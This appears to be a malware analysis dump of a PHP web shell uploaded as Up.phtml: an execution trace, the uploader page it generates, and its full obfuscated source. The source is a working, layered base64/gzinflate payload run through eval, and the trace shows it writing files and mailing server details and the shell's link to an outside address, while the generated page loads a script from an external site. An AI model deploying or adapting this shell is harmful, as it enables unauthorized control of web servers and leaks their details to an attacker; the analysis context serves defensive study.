4	28	0	0.002213	425640	fwrite	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	56	2	resource(5) of type (stream)	'<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAim'
4	28	1	0.002249	425704
4	28	R			894
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	51	$p = '/var/www/html//var/www/html'
4	29	0	0.002274	425648	is_dir	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	52	1	'/var/www/html//var/www/html'
4	29	1	0.002292	425688
4	29	R			FALSE
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	64	$a = 'hacklinksatis@gmail.com'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	65	$b = 'upload script'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	66	$c = 'Dosya Yolu : /var/www/html\r\n'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	68	$c .= 'Server Admin : webmaster@localhost\r\n'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	70	$c .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	72	$c .= 'Shell Link : http://localhost/uploads/Up.phtml\r\n'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	74	$c .= 'Avlanan Site : localhost\r\n'
4	30	0	0.002397	425872	mail	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	76	3	'hacklinksatis@gmail.com'	'upload script'	'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/Up.phtml\r\nAvlanan Site : localhost\r\n'
4	30	1	0.003343	425968
4	30	R			FALSE
3	15	1	0.003366	425872
2	7	1	0.003376	407120
			0.003460	324528
TRACE END   [2023-02-13 00:52:20.322956]


Generated HTML code

<html><head><title>Uploader</title></head><body><center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></form></font></center><center><font color="#11f0f3"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></font><center><script src="http://teledramasinhala.com/img/icons/image.js"></script>
</center></center></body></html>

Original PHP code

<?php

$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "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";
eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));
exit;
?>